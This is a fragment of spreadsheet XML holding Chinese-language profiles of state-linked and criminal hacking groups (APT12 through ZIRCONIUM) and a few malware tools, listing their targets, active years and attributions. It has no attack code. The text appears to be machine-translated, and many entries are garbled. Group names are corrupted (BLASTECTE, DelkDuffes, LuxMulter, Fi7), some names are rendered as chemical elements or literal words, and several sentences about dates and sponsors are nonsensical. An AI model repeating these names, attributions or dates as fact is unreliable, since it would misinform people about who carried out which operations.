    <t>APT12是一个被认为是中国的威胁组织。该组织针对各种受害者，包括但不限于媒体、高科技公司和多个政府。</t>
  </si>
  <si>
    <t>APT16是一家总部位于中国的威胁组织，针对日本和台湾组织发起了先锋式网络钓鱼活动。</t>
  </si>
  <si>
    <t>APT17是一个总部位于中国的威胁组织，对美国政府实体、国防工业、律师事务所、信息技术公司、矿业公司和非政府组织进行网络入侵。</t>
  </si>
  <si>
    <t>APT18是一个威胁组织，至少从2009年开始运作，针对一系列行业，包括技术、制造业、人权组织、政府和医疗。</t>
  </si>
  <si>
    <t>APT28是一个威胁组织，隶属于俄罗斯总参谋部主要情报局（GRU）第85主要特别服务中心（GTsSS）军事部队26165。该组织至少从2004年开始活跃。</t>
  </si>
  <si>
    <t>APT29是俄罗斯对外情报局（SVR）的威胁组织。[1] [2]他们至少从2008年开始运作，通常针对欧洲和北约成员国的政府网络、研究机构和智库。据报道，APT29从2015年夏天开始损害了民主党全国委员会</t>
  </si>
  <si>
    <t>APT3是一个总部位于中国的威胁组织，研究人员认为该组织隶属于中国国家安全部。这个组织负责被称为“秘密狐狸行动”、“秘密狼行动”和“双击行动”的活动。截至2015年6月，该组织似乎已经从主要针对美国受害者转向香港主要的政治组织。</t>
  </si>
  <si>
    <t>APT19是一家总部位于中国的威胁集团，针对多个行业，包括国防、金融、能源、制药、电信、高科技、教育、制造和法律服务。2017年，针对七家法律和投资公司开展了网络钓鱼活动。[1] 一些分析人士将APT19和Deep Panda视为同一个群体，但从开源信息来看，这两个群体是否相同尚不清楚。</t>
  </si>
  <si>
    <t>APT30是一个被怀疑与中国政府有关的威胁组织。虽然Naikon与APT30有一些共同的特点，但这两组似乎并不完全匹配。</t>
  </si>
  <si>
    <t>APT32是一个可疑的越南威胁组织，自2014年以来一直活跃。该组织针对多个私营行业以及外国政府、异见人士和记者，重点关注越南、菲律宾、老挝和柬埔寨等东南亚国家。他们广泛使用战略性网络妥协来妥协受害者。</t>
  </si>
  <si>
    <t>APT37是一个由朝鲜国家赞助的网络间谍组织，自2012年以来一直活跃。该组织主要针对韩国的受害者，但也针对日本、越南、俄罗斯、尼泊尔、中国、印度、罗马尼亚、科威特和中东其他地区的受害者。APT37还与2016-2018年间的以下活动相关：黎明行动、埃雷巴斯行动、黄金时段、邪恶的新年，你快乐吗？，免费牛奶、朝鲜人权和2018年邪恶新年。</t>
  </si>
  <si>
    <t>APT33是一个疑似伊朗威胁组织，至少自2013年以来一直在开展行动。该组织瞄准了美国、沙特阿拉伯和韩国多个行业的组织，特别关注航空和能源行业。</t>
  </si>
  <si>
    <t>APT38是一个由朝鲜国家赞助的威胁组织，专门从事金融网络操作；这是侦察总局的功劳。[1] APT38至少从2014年开始活跃，其目标是全球至少38个国家的银行、金融机构、赌场、加密货币交易所、SWIFT系统端点和ATM机。重大行动包括2016年孟加拉国银行抢劫案，其中APT38盗窃了8100万美元，以及对Bancomext（2018年）和智利银行（2018年）的袭击；他们的一些攻击具有破坏性。</t>
  </si>
  <si>
    <t>APT39是由伊朗情报和安全部（MOIS）通过前沿公司RNA智能计算进行的网络间谍活动的几个名称之一，因为至少有2014个。APT39主要针对伊朗以及亚洲、非洲、欧洲和北美的旅游、酒店、学术和电信行业，以跟踪被MOI视为威胁的个人和实体。</t>
  </si>
  <si>
    <t>APT41是一个受威胁的组织，研究人员将其评估为中国国家资助的间谍组织，该组织还开展经济活动。至少自2012年以来，APT41一直活跃在14个国家的医疗保健、电信、科技和视频游戏行业。APT41至少部分与Batho和Winnti Group等集团的公开报告重叠。</t>
  </si>
  <si>
    <t>Axiom是一个涉嫌与中国政府有关的网络间谍组织。它负责SMN活动的运营。尽管该组和Winnti组都使用Windows的恶意软件Winnti，但根据报告组的TTP和目标的不同，这两个组似乎是不同的。</t>
  </si>
  <si>
    <t>BackdoorDiplomacy 是一个网络间谍威胁组织，至少自2017年以来一直活跃。后门外交的目标是非洲、欧洲、中东和亚洲的外交部和电信公司。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BlackOasis是一家中东威胁集团，据信是Gamma group的客户。该组织对联合国的知名人士、反对派博客作者、活动人士、地区新闻记者和智库表示了兴趣。据报道，一个被微软称为钕的组织与BlackOasis的运营密切相关，但尚未确定该组织名称为别名的证据。</t>
  </si>
  <si>
    <t>BLASTECTE是一个网络间谍组织，标准杆数在东亚，特别是台湾，偶尔也有日本和香港。</t>
  </si>
  <si>
    <t>Blue Mockingbird是一组观察到的活动，涉及Monero cryptocurrency在Windows系统上以动态链接库（DLL）形式挖掘有效负载。最早观察到的蓝色知更鸟工具是2019年12月发明的。</t>
  </si>
  <si>
    <t>BRONZE BUTLER 是一个可能起源于中国的网络间谍组织，至少从2008年开始活跃。该组织主要针对日本组织，尤其是政府、生物技术、电子制造和工业化学领域的组织。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Carbanak是一个网络犯罪组织，至少自2013年以来，该组织一直使用Carbanak恶意软件攻击金融机构。Carbanak可能与Cobalt Group和FIN7等单独追踪的、也使用过Carbanak恶意软件的组织有关。</t>
  </si>
  <si>
    <t>Bouncing Golf是一项针对中东国家的网络间谍活动。</t>
  </si>
  <si>
    <t>奇美拉是一个可疑的中国威胁集团，自2018年以来一直活跃于台湾半导体行业以及航空业的数据。</t>
  </si>
  <si>
    <t>Cleaver 是一个被认为是伊朗行为者的威胁组织，负责追踪“克里弗行动”的活动。强有力的间接证据表明克里弗与威胁组织2889（TG-2889）有关。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cobalt Group是一个以财务为动机的威胁集团，至少自2016年以来主要针对金融机构。该集团通过针对ATM系统、卡处理、支付系统和SWIFT系统进行入侵，以窃取资金。Cobalt Group主要针对东欧、中亚和东南亚的银行。其中一名被指控的领导人于2018年初在西班牙被捕，但该组织似乎仍很活跃。众所周知，该组织以组织为目标，利用这些组织的访问权，对其他受害者进行妥协。报告显示，Cobalt Group与恶意软件Carbanak和Group Carbanak之间可能存在关联。</t>
  </si>
  <si>
    <t>CopyKittens是一个伊朗网络间谍组织，至少从2013年开始运作。它的目标国家包括以色列、沙特阿拉伯、土耳其、美国、约旦和德国。该组织负责被称为枯萎郁金香行动的活动。</t>
  </si>
  <si>
    <t>Costarito是一个涉嫌雇佣黑客的网络间谍活动，至少自2019年以来，该活动针对全球多个行业。科斯塔里托的目标主要是金融机构，分布在欧洲、美洲、亚洲、澳大利亚和非洲，主要集中在南亚。</t>
  </si>
  <si>
    <t>Dark Caracal是黎巴嫩安全总局（GDGS）的一个威胁组织，至少从2012年开始运作。</t>
  </si>
  <si>
    <t>Darkhotel是一个可疑的韩国威胁组织，至少自2004年以来主要针对东亚的受害者。该组织的名字来源于通过酒店互联网网络对旅行高管和其他精选客人进行的网络间谍活动。Darkhotel还通过点对点和文件共享网络开展了网络钓鱼活动，并感染了受害者。</t>
  </si>
  <si>
    <t>DelkDuffes是一个威胁团体，目标是中东的政府机构和教育机构，至少2016。该组织大量利用开源工具和定制有效载荷进行攻击。</t>
  </si>
  <si>
    <t>DarkVishnya是一个以财务为动机的威胁行动方，目标是东欧的金融机构。2017-2018年，该组织袭击了该地区至少8家银行。</t>
  </si>
  <si>
    <t>Deep Panda是一个可疑的中国威胁组织，已知其目标是许多行业，包括政府、国防、金融和电信。对医疗保健公司Anthem的入侵被认为是深层次的熊猫。这个群体也被称为空壳船员、网站管理员、功夫小猫和平帕人。深熊猫似乎也被称为黑藤，因为这两个群体的名字都归因于国歌入侵。一些分析人士将Deep Panda和APT19视为同一个群体，但从开源信息来看，这两个群体是否相同尚不清楚。</t>
  </si>
  <si>
    <t>Dragonfly 是一个网络间谍组织，至少自2011年以来一直活跃。他们最初的目标是国防和航空公司，但在2013年初转向关注能源行业。他们还瞄准了与工业控制系统相关的公司。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dragonfly 2.0是一个可疑的俄罗斯集团，至少自2015年12月以来，该集团一直以政府实体和多个美国关键基础设施部门为目标。关于Dragonfly 2.0和Dragonfly之间的重叠程度存在争议，但有足够的证据表明它们被作为两个独立的组进行跟踪。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DragonOK是一个威胁组织，用网络钓鱼邮件攻击日本组织。由于TTP重叠，包括类似的定制工具，DragonOK被认为与威胁组织Moafee有直接或间接的关系。众所周知，它使用各种恶意软件，包括Sysget/HelloBridge、PlugX、Toxinivy、FormerFirstat、NFlog和NewCT。</t>
  </si>
  <si>
    <t>沙尘暴是一个威胁组织，针对日本、韩国、美国、欧洲和几个东南亚国家的多个行业。</t>
  </si>
  <si>
    <t>Elderwood是一个可疑的中国网络间谍组织，据报道，该组织对2009年被称为“极光行动”的谷歌入侵负责。该组织的目标是国防组织、供应链制造商、人权和非政府组织（NGO）以及IT服务提供商。</t>
  </si>
  <si>
    <t>Equation是一个复杂的威胁组织，使用多种远程访问工具。该组织已知使用零日漏洞攻击，并已开发出覆盖硬盘固件的能力。</t>
  </si>
  <si>
    <t>Evilnum是一个以财务为动机的威胁组织，自2018年以来一直活跃。</t>
  </si>
  <si>
    <t>“凶猛小猫”是一个威胁组织，至少自2015年以来，该组织主要针对伊朗讲波斯语的个人。</t>
  </si>
  <si>
    <t>FIN10是一个以财务为动机的威胁组织，至少从2013年到2016年，它一直以北美的组织为目标。该组织利用从受害者身上窃取的数据敲诈组织。</t>
  </si>
  <si>
    <t>FIN4是一个以财务为动机的威胁集团，至少自2013年以来，它一直以与公共金融市场相关的机密信息为目标，尤其是与医疗保健和制药公司有关的机密信息。FIN4的独特之处在于，它们不会用典型的持久性恶意软件感染受害者，而是专注于获取授权访问电子邮件和其他非公开通信的凭据。</t>
  </si>
  <si>
    <t>FIN5是一个以财务为动机的威胁组织，其目标是个人身份信息和支付卡信息。该集团至少从2008年起就一直活跃，并瞄准了餐饮、游戏和酒店行业。该组织由可能会说俄语的演员组成。</t>
  </si>
  <si>
    <t>FIN6是一个网络犯罪组织，窃取了支付卡数据，并在地下市场上出售以牟利。该集团积极针对酒店和零售行业的销售点（PoS）系统，并对其进行了妥协。</t>
  </si>
  <si>
    <t>FIN7是一个以财务为动机的威胁组织，自2013年以来一直活跃于美国零售、餐饮和酒店行业，经常使用销售点恶意软件。Fi7的一部分被前沿公司称为COMBI安全。自2020年以来，FIN7将业务转移到大型狩猎（BGH）方法，包括使用REvil勒索软件和他们自己的勒索软件即服务（RaaS），即Darkside。FIN7可能与Carbanak组有关，但似乎有多个组使用Carbanak恶意软件，因此会单独跟踪。</t>
  </si>
  <si>
    <t>FIN8是一个以财务为动机的威胁组织，以针对零售、餐饮和酒店业发起量身定制的网络钓鱼活动而闻名。</t>
  </si>
  <si>
    <t>福克斯小猫是一个威胁性的演员，对伊朗政府一直有怀疑，因为至少在2017个反对中东、北非、欧洲、澳大利亚和北美国的实体。Fox Kitten瞄准了多个垂直行业，包括石油和天然气、技术、政府、国防、医疗保健、制造业和工程。</t>
  </si>
  <si>
    <t>Frankenstein是一场在2019年1月至4月期间由未知威胁参与者发起的运动。这个活动的名字来自于演员们将几个不相关的部分拼凑在一起的能力。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GALLIUM是一个至少自2012年以来一直活跃的集团，主要针对知名电信网络。在一些报道中，镓可能是中国国家资助的团体，部分基于使用的工具和通常与中国威胁行为者有关的TTP。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GalMeung'是一个网络间谍组织，针对中东的受害者，自2017年12月以来一直活跃。该组织主要针对国防、军事和政府部门的受害者。</t>
  </si>
  <si>
    <t>Gamaredon集团是一个威胁组织，至少自2013年以来一直活跃，目标是可能参与乌克兰政府的个人。Gamaredon Group的名字来源于“世界末日”一词的拼写错误，该词在对手的早期战役中被发现。</t>
  </si>
  <si>
    <t>GCMAN是一个威胁组织，主要针对银行，目的是将资金转移到电子货币服务。</t>
  </si>
  <si>
    <t>GOLD SOUTHFIELD是一个至少自2019年起就活跃在金融领域的威胁组织，运营着REvil勒索软件即服务（RaaS）。GOLD SOUTHFIELD为在地下论坛上招募的从事高价值部署的分支机构提供后端基础设施。</t>
  </si>
  <si>
    <t>Gorgon Group是一个威胁组织，成员被怀疑来自巴基斯坦或与巴基斯坦有其他联系。该组织实施了一系列犯罪和有针对性的袭击，包括针对英国、西班牙、俄罗斯和美国政府组织的行动。</t>
  </si>
  <si>
    <t>Group5是一个疑似与伊朗有联系的威胁集团，但这一归属尚不明确。该组织通过网络钓鱼和水坑攻击与叙利亚反对派有关的个人，通常使用叙利亚和伊朗主题。Group5使用了两种常见的远程访问工具（RATs），njRAT和NanoCore，以及Android RAT DroidJack。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HAFNIUM是一个很有可能的国家网络间谍组织，自2021年1月起一直活跃在中国。铪主要针对美国多个行业的实体，包括传染病研究人员、律师事务所、高等教育机构、国防承包商、政策智库和非政府组织。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Higaisa是一个被怀疑起源于韩国的威胁组织。Higaisa瞄准了朝鲜的政府、公众和贸易组织；然而，他们也在中国、日本、俄罗斯、波兰和其他国家发动了袭击。Higaisa于2019年初首次披露，但据评估，早在2009年就开始运营。</t>
  </si>
  <si>
    <t>蜜蜂是一个由一个不知名的参与者领导的运动，目标是人道主义援助组织，在越南、新加坡、阿根廷、日本、印度尼西亚和加拿大都很活跃。自2017年8月以来，直到2018年2月，它一直在积极运作。</t>
  </si>
  <si>
    <t>“盗梦空间”是一个网络间谍组织，至少从2014年开始活跃。该组织主要针对俄罗斯的多个行业和政府实体，但也活跃于美国以及整个欧洲、亚洲、非洲和中东地区。</t>
  </si>
  <si>
    <t>IndigoZebra是一个可疑的中国网络间谍组织，至少自2014年以来一直以中亚各国政府为目标。</t>
  </si>
  <si>
    <t>Indrik Spider是一家总部位于俄罗斯的网络犯罪集团，自2014年以来一直活跃。Indrik Spider最初是从Dridex banking特洛伊木马开始的，然后到2017年，他们开始使用BitPaymer、WastedLocker和Hades勒索软件运行勒索软件操作。</t>
  </si>
  <si>
    <t>Ke3chang是一个由在中国境外活动的参与者组成的威胁组织。科昌瞄准了几个行业，包括石油、政府、军事等。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kimsuky是一个总部位于朝鲜的网络间谍组织，自2012年以来一直活跃。该组织最初的目标是韩国政府实体、智囊团和被认定为各个领域专家的个人，并将其业务范围扩大到包括美国、俄罗斯、欧洲和联合国。Kimsuky的情报收集活动集中在与朝鲜半岛、核政策和制裁有关的外交政策和国家安全问题上。</t>
  </si>
  <si>
    <t>Lazarus集团是一个由朝鲜国家赞助的网络威胁集团，被认为是侦察总局的成员。该组织至少从2009年开始活跃，据报道，该组织对2014年11月针对索尼影业娱乐的破坏性雨刷攻击负有责任，这是Novetta发起的名为“百视达行动”的活动的一部分。Lazarus Group使用的恶意软件与其他报告的活动相关，包括火焰行动、1号任务行动、特洛伊行动、黑暗之城行动和十天降雨。</t>
  </si>
  <si>
    <t>LuxMulter是一个自2017年初以来一直针对中东的政府组织和商业实体的伊朗威胁集团。</t>
  </si>
  <si>
    <t>Leviathan是一个由海南政府赞助的网络间谍组织，标准杆数被归为国家安全部（MSS）、美国国家安全部和附属前沿公司。《利维坦》至少从2009年开始活跃，它瞄准了以下领域：学术界、航空航天、生物医学、国防工业基地、政府、医疗保健、制造业、海运以及横跨美国、加拿大、欧洲、中东和东南亚的运输。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>莲花是一个针对东南亚政府和军事组织的威胁组织。</t>
  </si>
  <si>
    <t>弯刀是一个涉嫌讲西班牙语的网络间谍组织，至少自2010年以来一直活跃。它的业务主要集中在拉丁美洲，特别是委内瑞拉，但也在美国、欧洲、俄罗斯和亚洲部分地区。弯刀一般针对政府机构、情报机构和军事单位等知名组织，以及电信和电力公司。</t>
  </si>
  <si>
    <t>Magic Hound是一个由伊朗赞助的威胁组织，从事长期、资源密集型的网络间谍活动，可能代表伊斯兰革命卫队。至少自2014年以来，他们通过复杂的社会工程运动，将美国和中东的政府和军事人员、学者、记者以及世界卫生组织（WHO）等组织作为目标。</t>
  </si>
  <si>
    <t>menuPass是一个威胁组织，至少自2006年以来一直活跃。据悉，menuPass的个别成员曾与中国国家安全部（MSS）天津国家安全局合作，并在华英海泰科技发展公司工作。</t>
  </si>
  <si>
    <t>Moafee是一个似乎在中国广东省活动的威胁组织。由于TTP重叠，包括类似的定制工具，Moafee被认为与威胁组织DragonOK有直接或间接的关系。</t>
  </si>
  <si>
    <t>莫方很可能是一个总部位于中国的网络间谍组织，因其经常模仿受害者的基础设施而得名。至少自2012年5月以来，观察到该对手对缅甸政府和关键基础设施，以及包括军事、汽车和武器工业在内的其他几个国家和部门进行了集中攻击。</t>
  </si>
  <si>
    <t>Molerats是一个讲阿拉伯语、有政治动机的威胁组织，自2012年以来一直在运作。该组织的受害者主要分布在中东、欧洲和美国。</t>
  </si>
  <si>
    <t>MuddyWater是一个伊朗威胁组织，主要针对中东国家，也针对欧洲和北美国家。该组织的受害者主要在电信、政府（IT服务）和石油行业。该组织的活动之前与FIN7有关，但该组织被认为是一个独特的组织，可能受到间谍活动的驱使。</t>
  </si>
  <si>
    <t>Mustang Panda是一家总部位于中国的网络间谍威胁公司，该公司于2017年首次被发现，但可能至少从2014年起就开始运营。野马熊猫的目标是美国、德国、蒙古、缅甸、巴基斯坦和越南等国的政府实体、非营利组织、宗教和其他非政府组织。</t>
  </si>
  <si>
    <t>奈康被评估为中国人民解放军成都军区第二技术侦察局（部队掩护代号78020）下属的一个国家赞助的网络间谍组织。Naikon至少自2010年以来一直活跃，主要针对东南亚的政府、军事和民间组织，以及联合国开发计划署（UNDP）和东南亚国家联盟（东盟）等国际机构开展行动。</t>
  </si>
  <si>
    <t>NEODYMIUM是一个活动组织，于2016年5月开展了一场运动，主要针对土耳其受害者。由于受害者和活动特点的重叠，该组织与另一个名为PROMETHIUM的活动组织表现出了相似性。据报道，钕与BlackOasis的业务密切相关，但尚未确定该集团名称为别名的证据。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>“夜龙”是一个活动名称，指的是一个主要在中国开展活动的威胁组织。</t>
  </si>
  <si>
    <t>游牧章鱼是一个讲俄语的网络间谍威胁组织，至少自2014年以来，该组织主要针对中亚地区，包括地方政府、外交使团和个人。据观察，游牧章鱼主要使用Delphi编程语言进行涉及Android和Windows恶意软件的活动，并构建自定义变体。</t>
  </si>
  <si>
    <t>OilRig是一个可疑的伊朗威胁组织，至少自2014年以来一直以中东和国际受害者为目标。该集团瞄准了多个领域，包括金融、政府、能源、化工和电信。该组织似乎实施了供应链攻击，利用组织之间的信任关系来攻击其主要目标。FireEye评估，该组织代表伊朗政府开展工作的依据是基础设施细节，其中包括对伊朗的提及、对伊朗基础设施的使用，以及符合民族国家利益的目标。</t>
  </si>
  <si>
    <t>“沃曹行动”描述了一名中国网络间谍对手的活动。Wocao行动的目标是中国、法国、德国、英国和美国等多个国家的政府内部实体、管理服务提供商、能源、医疗和技术部门。沃曹行动使用了与APT20类似的TTP和工具，表明可能存在重叠。</t>
  </si>
  <si>
    <t>Orangeworm是一个至少自2015年以来一直以美国、欧洲和亚洲医疗保健行业的组织为目标的组织，其目标可能是企业间谍活动。</t>
  </si>
  <si>
    <t>Patchwork是一个网络间谍组织，于2015年12月首次被观察到。虽然该组织尚未确定归属，但间接证据表明，该组织可能是亲印度或印度实体。有人认为，拼凑工作的目标是与外交和政府机构有关的行业。该组织使用的大部分代码都是从在线论坛复制和粘贴的。在2018年3月和4月，还可以看到“拼凑”在针对美国智库团体开展网络钓鱼活动。</t>
  </si>
  <si>
    <t>PittyTiger是一个据信在中国境外活动的威胁组织，它使用多种不同类型的恶意软件来维持指挥和控制。</t>
  </si>
  <si>
    <t>PLATINUM 是一个活动组织，至少从2009年起就以受害者为目标。该组织专注于与南亚和东南亚各国政府和相关组织相关的目标。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>波塞冬集团是一个讲葡萄牙语的威胁集团，至少从2005年开始活跃。该组织有使用从受害者身上泄露的信息来敲诈受害者公司的历史，并将波塞冬集团作为一家安全公司与之签约。</t>
  </si>
  <si>
    <t>PROMETHIUM是一个专注于间谍活动的组织，至少自2012年以来一直活跃。该集团在全球开展业务，重点关注土耳其的目标。由于受害者和活动特征的重叠，PROMETHIUM与另一个名为钕的活动组表现出相似性。</t>
  </si>
  <si>
    <t>Putter Panda是一个中国威胁组织，隶属于解放军第三总参谋部第十二局61486部队。</t>
  </si>
  <si>
    <t>Rancor是一个威胁组织，领导了针对东南亚地区的有针对性的运动。Racon利用出于政治动机的诱饵诱使受害者打开恶意文件。</t>
  </si>
  <si>
    <t>Roke是一个据称会说中文的对手，其主要目标似乎是盗取密码，或窃取受害者系统资源以挖掘加密货币。Roke的名字来源于电子邮件地址“rocke@live.cn“用于创建存放收集到的加密货币的钱包。研究人员发现Roke和Iron Cybercrime集团之间存在重叠，但这一归属尚未得到证实。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RTM是一个网络犯罪集团，至少自2015年以来一直活跃，主要对俄罗斯和邻国的远程银行系统用户感兴趣。该组织使用同名特洛伊木马（RTM）。</t>
  </si>
  <si>
    <t>沙虫小组是一个破坏性威胁组织，隶属于俄罗斯总参谋部主要情报局（GRU）特殊技术主要中心（GTsST）的74455部队。至少从2009年起，这个组织就一直很活跃。</t>
  </si>
  <si>
    <t>猩红模仿组织是一个针对少数民族权利活动人士的威胁组织。该组织与政府消息来源没有直接联系，但该组织的动机似乎与中国政府的动机重叠。虽然Scarlet Mimic和Putter Panda使用的IP地址有些重叠，但尚未得出结论，这两个组是相同的。</t>
  </si>
  <si>
    <t>“神枪手行动”是2018年10月发现的一场针对核、国防、能源和金融公司的网络间谍活动的名称。虽然这个对手和拉撒路集团之间存在重叠，但尚未建立明确的联系。</t>
  </si>
  <si>
    <t>响尾蛇是一个可疑的印度威胁行动组织，至少自2012年以来一直活跃。据观察，他们的目标是亚洲各地的政府、军事和商业实体，主要集中在巴基斯坦、中国、尼泊尔和阿富汗。</t>
  </si>
  <si>
    <t>沉默是一种出于财务动机的威胁行为，针对不同国家的金融机构。该组织于2016年6月首次出现。他们的主要目标是俄罗斯、乌克兰、白俄罗斯、阿塞拜疆、波兰和哈萨克斯坦。他们破坏了各种银行系统，包括俄罗斯央行的自动工作站客户端、ATM和卡处理。</t>
  </si>
  <si>
    <t>沉默图书馆员是一个至少自2013年以来针对全球大学、政府机构和私营企业的研究和专有数据的组织。据了解，沉默图书馆员的成员隶属于伊朗马布纳研究所，该研究所应伊朗政府，特别是伊斯兰革命卫队（IRGC）的要求进行了网络入侵。</t>
  </si>
  <si>
    <t>SilverTerrier是一个尼日利亚威胁组织，自2014年以来一直活跃。SilverTerrier主要针对高科技、高等教育和制造业的组织。</t>
  </si>
  <si>
    <t>Sowbug是一个威胁组织，至少自2015年以来一直对南美和东南亚的组织，尤其是政府实体进行有针对性的攻击。</t>
  </si>
  <si>
    <t>隐形猎鹰是一个威胁组织，至少自2012年以来一直对阿联酋记者、活动人士和异见人士进行有针对性的间谍软件攻击。间接证据表明，该组织与阿拉伯联合酋长国（阿联酋）政府之间可能存在联系，但这一点尚未得到证实。</t>
  </si>
  <si>
    <t>Strider是一个至少自2011年以来一直活跃的威胁组织，其目标是俄罗斯、中国、瑞典、比利时、伊朗和卢旺达的受害者。</t>
  </si>
  <si>
    <t>Suckfly是一个总部位于中国的威胁组织，自2014年以来一直活跃。</t>
  </si>
  <si>
    <t>TA459是一个据信在中国境外活动的威胁组织，其目标国家包括俄罗斯、白俄罗斯、蒙古和其他国家。</t>
  </si>
  <si>
    <t>TA505是一个以财务为动机的威胁组织，至少自2014年以来一直活跃。该组织以频繁更换恶意软件和推动犯罪恶意软件分布的全球趋势而闻名。</t>
  </si>
  <si>
    <t>TA551是一个以财务为动机的威胁组织，自2018年以来一直活跃。该组织通过基于电子邮件的恶意软件分发活动，主要针对英语、德语、意大利语和日语使用者。</t>
  </si>
  <si>
    <t>TeamTNT是一个主要针对云和集装箱化环境的威胁组织。至少自2019年10月以来，该组织一直非常活跃，主要致力于利用云和容器资源在受害者环境中部署加密货币矿工。</t>
  </si>
  <si>
    <t>临时雇员Veles是一个总部位于俄罗斯的威胁组织，以关键基础设施为目标。据观察，该组织使用TRITON，这是一个恶意软件框架，旨在操纵工业安全系统。</t>
  </si>
  <si>
    <t>威胁组-1314是一个未分配的威胁组，它使用泄露的凭据登录受害者的远程访问基础设施。</t>
  </si>
  <si>
    <t>The White Company</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>The White Company很可能是国家资助的具有先进能力的威胁行动方。从2017年到2018年，该组织领导了一场名为“沙欣行动”的间谍活动，目标是巴基斯坦的政府和军事组织。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>威胁组织3390是一个中国威胁组织，广泛使用战略性网络妥协来打击受害者。该组织至少从2010年起就一直活跃，其目标是航空航天、政府、国防、技术、能源和制造业领域的组织。</t>
  </si>
  <si>
    <t>Thrip是一个间谍组织，其目标是美国和东南亚的卫星通信、电信和国防承包商公司。该组织使用定制恶意软件以及“以土地为生”技术。</t>
  </si>
  <si>
    <t>Tonto团队是一个可疑的中国国家赞助的网络间谍威胁组织，至少自2009年以来主要针对韩国、日本、台湾和美国；到2020年，他们将业务扩展到其他亚洲和东欧国家。Tonto团队的目标是政府、军队、能源、矿业、金融、教育、医疗和技术组织，包括通过心跳运动（2009-2012年）和苦饼干行动（2017年）。</t>
  </si>
  <si>
    <t>透明部落是一个可疑的巴基斯坦威胁组织，自2013年以来一直活跃，主要针对印度和阿富汗的外交、国防和研究组织。</t>
  </si>
  <si>
    <t>热带军团是一个无关联的威胁集团，它曾针对台湾、菲律宾和香港的目标发起了有针对性的战役。热带部队专注于政府、医疗保健、交通和高科技行业，自2011年以来一直活跃。</t>
  </si>
  <si>
    <t>Turla是一个总部位于俄罗斯的威胁组织，自2004年以来，已经在45个国家感染了受害者，涉及政府、大使馆、军事、教育、研究和制药公司等一系列行业。2015年年中活动加剧。Turla以开展水坑和鱼叉式网络钓鱼活动以及利用内部工具和恶意软件而闻名。Turla的间谍平台主要用于对付Windows机器，但也被用于对付macOS和Linux机器。</t>
  </si>
  <si>
    <t>Volatile Cedar是一个黎巴嫩威胁组织，针对全球的个人、公司和机构。Volatile Cedar自2012年开始运营，其动机是政治和意识形态利益。</t>
  </si>
  <si>
    <t>Whitefly是一个网络间谍组织，至少从2017年开始运作。该组织的目标是多个行业中主要位于新加坡的组织，主要对窃取大量敏感信息感兴趣。该组织与新加坡最大的公共卫生组织SingHealth的袭击有关。</t>
  </si>
  <si>
    <t>Windigo集团至少从2011年开始运营，利用Ebury SSH后门破坏了数千台Linux和Unix服务器，从而创建了一个垃圾邮件僵尸网络。尽管有针对创作者的执法干预，Windigo运营商在2019年继续更新Ebury。</t>
  </si>
  <si>
    <t>Windshift是一个至少自2017年以来一直活跃的威胁组织，其目标是在整个中东地区的政府部门和关键基础设施中进行监视的特定个人。</t>
  </si>
  <si>
    <t>Winnti Group是一个起源于中国的威胁组织，自2010年以来一直活跃。该集团已将大量目标对准了游戏行业，但也扩大了目标范围。一些报道表明，其他一些团体，包括Axiom、APT17和Ke3chang，与Winnti集团有密切联系。</t>
  </si>
  <si>
    <t>WIRTE是一个至少自2018年8月以来一直活跃的威胁组织。该组织主要针对中东的国防和外交官。</t>
  </si>
  <si>
    <t>Wizard Spider是一家总部位于俄罗斯、以财务为动机的威胁组织，最初因至少在2016年发明和部署TrickBot而闻名。Wizard Spider拥有各种各样的工具，并针对从大公司到医院的各种组织开展了勒索活动。</t>
  </si>
  <si>
    <t>ZIRCONIUM是一个在中国活动的威胁组织，至少自2017年以来一直活跃，目标是与2020年美国总统选举有关的个人和国际事务界的知名领导人。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文献</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>软件</t>
  </si>
  <si>
    <t>关联软件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4H RAT是Putter Panda至少从2007年开始使用的恶意软件。</t>
  </si>
  <si>
    <t>ABK是一款下载工具，至少从2019年开始被青铜管家使用。</t>
  </si>
  <si>
    <t>adbupd是铂使用的后门，类似于Dipsind。</t>
  </si>
  <si>
    <t>AdFind是一个免费的命令行查询工具，可用于从Active Directory收集信息。</t>
  </si>
  <si>
    <t>Adups是预装在Android设备上的软件，包括BLU Products生产的设备。据报道，该软件旨在帮助一家中国手机制造商监控用户行为，将敏感数据传输到中国服务器。</t>
  </si>
  <si>
    <t>ADVSTORESHELL是一个间谍后门，至少在2012年至2016年间被APT28使用。它通常用于长期间谍活动，并部署在侦察阶段后认为有趣的目标上。</t>
  </si>
  <si>
    <t>3PARA RAT</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3PARA RAT是一个远程编程工具（RAT），用C++编写，已被Putter Panda使用。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Allwinner是一家提供安卓平板电脑和其他设备所用处理器的公司。据报道，Allwinner为在这些设备上使用而分发的Linux内核包含一个后门。</t>
  </si>
  <si>
